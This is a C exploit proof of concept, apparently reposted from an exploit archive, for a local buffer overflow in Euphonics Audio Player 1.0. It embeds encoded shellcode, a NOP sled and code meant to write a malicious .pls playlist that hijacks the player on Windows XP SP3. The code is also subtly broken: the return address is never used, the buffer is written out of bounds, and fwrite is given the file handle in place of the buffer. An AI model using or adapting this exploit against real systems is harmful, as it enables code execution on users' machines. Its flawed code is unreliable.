Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)

========================================================================
Euphonics Audio Player 1.0 (.pls) Local Buffer Overflow Exploit (xp/sp3)
========================================================================




#include <stdio.h>
#include <windows.h>
#include <string.h>
#define overflow 1324
#define NOP 0x90
#define pls "Eye.pls"

int main (int argc,char **argv)
{
char winsp3[] = "\x7B\x46\x86\x7C";
char buffer[overflow];
FILE *Player;

unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
"\x96\x7d\xb2\x83\xeb\xfc\xe2\xf4\x10\x7e\x39\xb2\xec\x96\xf6\xf7"
"\xd0\x1d\x01\xb7\x94\x97\x92\x39\xa3\x8e\xf6\xed\xcc\x97\x96\xfb"
"\x67\xa2\xf6\xb3\x02\xa7\xbd\x2b\x40\x12\xbd\xc6\xeb\x57\xb7\xbf"
"\xed\x54\x96\x46\xd7\xc2\x59\xb6\x99\x73\xf6\xed\xc8\x97\x96\xd4"
"\x67\x9a\x36\x39\xb3\x8a\x7c\x59\x67\x8a\xf6\xb3\x07\x1f\x21\x96"
"\xe8\x55\x4c\x72\x88\x1d\x3d\x82\x69\x56\x05\xbe\x67\xd6\x71\x39"
"\x9c\x8a\xd0\x39\x84\x9e\x96\xbb\x67\x16\xcd\xb2\xec\x96\xf6\xda"
"\xd0\xc9\x4c\x44\x8c\xc0\xf4\x4a\x6f\x56\x06\xe2\x84\x66\xf7\xb6"
"\xb3\xfe\xe5\x4c\x66\x98\x2a\x4d\x0b\xf5\x1c\xde\x8f\xb8\x18\xca"
"\x89\x96\x7d\xb2";

printf("\n******************************************");
printf("\n* THIS BUG ORGINAL DISCOVER BY h4ck3r#47 *");
printf("\n* THIS BUG C0DED BY SINGLE EYE           *");
printf("\n* SPECIAL THANKS TO STR0KE               *");
printf("\n******************************************");
memset(buffer,NOP,overflow);
memcpy(buffer,shellcode,sizeof(shellcode)-1);
buffer[overflow] = 0;
Player = fopen(pls,"w+");
fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);
fclose(Player);
printf("\n DOne Poc !!");
return 0;
}



#  0day.today [2018-03-14]  #